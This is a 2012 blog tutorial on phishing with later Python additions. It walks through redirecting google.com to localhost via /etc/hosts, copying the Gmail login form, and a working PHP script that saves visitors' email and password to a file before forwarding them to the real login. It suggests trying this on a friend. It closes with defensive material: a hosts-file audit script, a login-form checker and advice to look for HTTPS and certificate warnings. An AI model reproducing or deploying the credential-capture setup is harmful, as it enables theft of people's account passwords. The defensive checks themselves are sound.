Monday, July 23, 2012

How to phish and not to get phished



As more commerce and more personal information move online, the need to secure them grows with it. The Internet is still people talking to people, and the judgments about whom to trust that we make offline carry over, together with the same ways of being fooled.

Phishing (of course, read it as "fishing" :P) is one of the most treacherous menaces on the web, and its consequences are real: loss of money, stolen passwords and compromise of sensitive information.

In this post I show how the simplest phishing trick is performed (thanks to Vignesh T Prabhu for showing me this trick), so that avoiding it can also be made effective. This version works only on the attacker's own machine; putting it in front of other people's browsers takes a little extra know-how that is not covered here.

Based on my experience with the audience I have been dealing with, I will touch upon some fundamentals: DNS, the Apache web server, the GNU/Linux directory layout and a little coding.

DNS Server:

Domain Name System servers are, for our purposes, lookup tables that map hostnames (the google.com part of a URL) to IP addresses (a more elaborate post about it here).
For our trick we only need to know that on a GNU/Linux machine the first place name resolution is attempted is the file /etc/hosts: the resolver consults it before asking any DNS server (the order is set in /etc/nsswitch.conf, and files comes before dns on practically every distribution).
A stock /etc/hosts maps 127.0.0.1 to localhost and the machine's own hostname, and ::1 to the IPv6 equivalents. Standard entries look like this:


Because in phishing we purport to be a web page we are not, I use localhost as the web server that pretends to be the target.
For instance, try ping google.com; it gets a reply from one of Google's IP addresses, as shown below:


Here google.com resolved to 74.125.236.206 (the address you see will differ).
In our case we will make the local machine answer to the name google.com.
So add an entry to /etc/hosts:

sudo nano /etc/hosts (to edit the file)
and append
127.0.0.1     google.com
save it.
Note the order: hosts(5) wants the address first, then one or more names; a line written the other way round fails to parse and is skipped. 127.0.0.1 is the address of the loopback interface (lo), that is, the machine itself. Every name the victim might type has to be listed, so in practice you would put www.google.com, and whatever hostname the real login page lives on, on the same line as well.

Now ping google.com again, and the reply comes from 127.0.0.1:




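As an added example (not part of the original post), here is a small Python audit of a file in the /etc/hosts format above. It resolves a name the way the files backend does, flags entries that pin public-looking hostnames to an address (which is exactly what the entry just added does), and catches the reversed-field mistake, which the resolver silently skips. The hosts text is constructed for the demo, and the "looks public" rule is a heuristic of my own rather than anything glibc does.

```python
import ipaddress

# Constructed sample (not a real machine's file): the stock Debian entries plus
# the phishing entry from this post, written once in the correct hosts(5) order
# and once with the two fields reversed.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
127.0.1.1       mybox
::1             ip6-localhost ip6-loopback
# the phishing entry in correct order: address first, then names
127.0.0.1       google.com www.google.com
# same intent with the fields reversed: the resolver skips this line
google.com      127.0.0.1
"""

LOCAL_NAMES = {"localhost", "ip6-localhost", "ip6-loopback",
               "ip6-allnodes", "ip6-allrouters"}
LOCAL_SUFFIXES = (".local", ".localdomain", ".localhost")


def parse_hosts(text):
    """Return (entries, malformed): entries as (ip, [names]) in file order,
    malformed as (line number, raw line) for lines whose first field is not
    an address, which the libc files resolver ignores."""
    entries, malformed = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            malformed.append((lineno, raw))
            continue
        entries.append((ip, fields[1:]))
    return entries, malformed


def resolve(text, name):
    """Address the first matching line gives for name, or None (simplified:
    the real resolver may return several addresses; ping shows the first)."""
    wanted = name.lower().rstrip(".")
    for ip, names in parse_hosts(text)[0]:
        if wanted in (n.lower().rstrip(".") for n in names):
            return str(ip)
    return None


def looks_public(name):
    """Heuristic (an assumption of this example): a dotted name that is not
    one of the conventional local names is a name the public DNS owns."""
    n = name.lower().rstrip(".")
    return n not in LOCAL_NAMES and not n.endswith(LOCAL_SUFFIXES) and "." in n


def audit(text):
    """Findings for entries that pin public-looking names, plus malformed lines."""
    entries, malformed = parse_hosts(text)
    findings = []
    for ip, names in entries:
        pinned = [n for n in names if looks_public(n)]
        if pinned:
            kind = "loopback" if ip.is_loopback else "private" if ip.is_private else "public"
            findings.append(f"{', '.join(pinned)} pinned to {ip} ({kind} address)")
    for lineno, raw in malformed:
        findings.append(f"line {lineno} malformed, address must come first: {raw.strip()!r}")
    return findings


if __name__ == "__main__":
    print("google.com ->", resolve(SAMPLE_HOSTS, "google.com"))
    for finding in audit(SAMPLE_HOSTS):
        print("FINDING:", finding)
```

Run against the real file (python3 audit.py < /etc/hosts, after swapping SAMPLE_HOSTS for sys.stdin.read()) this is a one-minute check for the hijack described here on any machine you are asked to log in from.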
Apache Webserver

The nice thing about running a GNU/Linux box is that you already have an almost fully fledged server at hand. For this hack we need a web server, and Apache runs without fuss on any GNU/Linux distribution.

Install Apache together with the PHP module (Debian-based distributions):

sudo apt-get install apache2 libapache2-mod-php5

(On current releases the module package is called libapache2-mod-php. Without it Apache serves phishing.php as plain text instead of running it.)

Once installed, check that the server is running: open a web browser, enter localhost, and the default page should look like this:


Now also enter google.com in the browser: thanks to the hosts entry it lands on the same default page.


Now, we're ready to phish.

HTML file:

Open the Google Mail login page, view its source (Ctrl+U) and copy it into a text document.

Find the form's action attribute and replace Google's authentication URL with "phishing.php" (the PHP script we will be using to phish). While you are there, note the name attributes of the username and password inputs: the script has to read exactly those names.
Save the HTML file under a relevant name, for example login.html. Relative stylesheet and image links in the copied source now point at your own server and will break; absolute ones still load.

PHP script:

Here is a simple PHP script that appends the login name and password submitted to the phishing page to a file and then redirects to the real authentication page, so the victim just sees the genuine login form.

<?php
// Append the submitted credentials to password.txt in the same directory as
// this script (the file name is case-sensitive on Linux).
$handle = fopen("password.txt", "a");
// The keys must match the name= attributes of the inputs in the copied form;
// Google's form used "Email" and "Passwd" at the time of writing.
fwrite($handle, $_POST["Email"]);
fwrite($handle, "\n");
fwrite($handle, $_POST["Passwd"]);
fwrite($handle, "\n\n");
fclose($handle);
// Nothing may be output before this call: header() fails once the response
// body has started, which is why there are no <html> tags around the script.
header("Location: https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>


Save the PHP script as phishing.php.

Create an empty text file password.txt.

Now copy the three files login.html, phishing.php and password.txt to the web server's default document root, /var/www (on Apache 2.4 packages it is /var/www/html):

sudo cp login.html phishing.php password.txt /var/www

password.txt must be writable by the user Apache runs phishing.php as (www-data on Debian). The easy and lazy way is

sudo chmod 777 /var/www/password.txt

The less lazy way is to make the file owned by www-data with mode 600, and to keep it outside the document root: anything under /var/www can be fetched by whoever guesses the file name, captured passwords included.

Now you can pull the prank on a friend: let them log in to their Google Mail account on your machine, then read password.txt to see their password. All they see is the real login form again, with nothing to suggest what has happened.

The solution:

HTTPS is the safest way to browse, and a quick look at the certificate reveals who you are really talking to.

The real Google Mail login page is served over HTTPS with a certificate for its hostname signed by a CA the browser trusts; the phishing page is served over plain HTTP, and an attacker who only controls name resolution cannot obtain a trusted certificate for google.com (a self-signed one would make the browser warn). So the check is simple: before typing a password, make sure the address bar says https, the padlock is present and there is no certificate warning.
Use HTTPS Everywhere by EFF to make the browser insist on https for sites that offer it; that defeats most attempts of this kind :)
Phishing page without secure connection and a warning

Secure login page with SSL certification
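As an added example serving both the HTML step and the check above (not part of the original post): the Python below pulls the login form out of a saved page, lists the input names a capture script has to read from $_POST, and reports why a user should refuse to type a password into the form: a non-POST method, an action that is not https, or an action on a different host from the page itself. Run on the hosts-file setup in this post, it flags the phishing copy for posting over plain http, the same thing the missing padlock tells you. The HTML, the URLs and the field names are constructed for the demo, not copied from any real site.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample (not copied from any real site): a login form whose
# action has been rewritten to phishing.php as the post describes. The input
# names are whatever the copied page used; "Email"/"Passwd" are assumed here.
PHISH_PAGE_URL = "http://google.com/login.html"   # the hosts-file-pinned name
PHISH_HTML = """
<form id="loginform" action="phishing.php" method="post">
  <input type="hidden" name="continue" value="https://mail.google.com/mail/">
  <input type="email" name="Email" id="Email">
  <input type="password" name="Passwd" id="Passwd">
  <input type="submit" value="Sign in">
</form>
"""

# The same form as a genuine site would serve it: https, same host as the page.
# The hostnames are assumptions for the demo.
REAL_PAGE_URL = "https://accounts.example.com/ServiceLogin"
REAL_HTML = PHISH_HTML.replace(
    'action="phishing.php"',
    'action="https://accounts.example.com/ServiceLoginAuth"')


class FormCollector(HTMLParser):
    """Record each <form>'s action and method and the (name, type) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("name"), (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def password_forms(html):
    """Forms that contain a password field: the ones a phisher cares about."""
    parser = FormCollector()
    parser.feed(html)
    return [f for f in parser.forms
            if any(t == "password" for _, t in f["inputs"])]


def credential_field_names(form):
    """Input names a capture script must read from $_POST, in page order."""
    return [n for n, t in form["inputs"] if t in ("text", "email", "password")]


def login_form_warnings(page_url, form):
    """Reasons not to type a password into this form. An empty list means the
    form posts over https to the host the page itself came from."""
    page = urlsplit(page_url)
    target = urlsplit(urljoin(page_url, form["action"] or page_url))
    warnings = []
    if form["method"] != "post":
        warnings.append("credentials would travel in the URL (method is not POST)")
    if target.scheme != "https":
        warnings.append(f"credentials sent over {target.scheme or 'http'}, not https")
    if target.hostname != page.hostname:
        warnings.append(f"form posts to {target.hostname}, page came from {page.hostname}")
    return warnings


if __name__ == "__main__":
    for label, url, html in (("phish", PHISH_PAGE_URL, PHISH_HTML),
                             ("real", REAL_PAGE_URL, REAL_HTML)):
        for form in password_forms(html):
            print(label, "fields:", credential_field_names(form))
            print(label, "warnings:", login_form_warnings(url, form) or "none")
```

The scheme check on its own is not enough: an attacker who controls resolution can also serve https with a self-signed certificate, which is why the browser's certificate warning is the other half of the check described above.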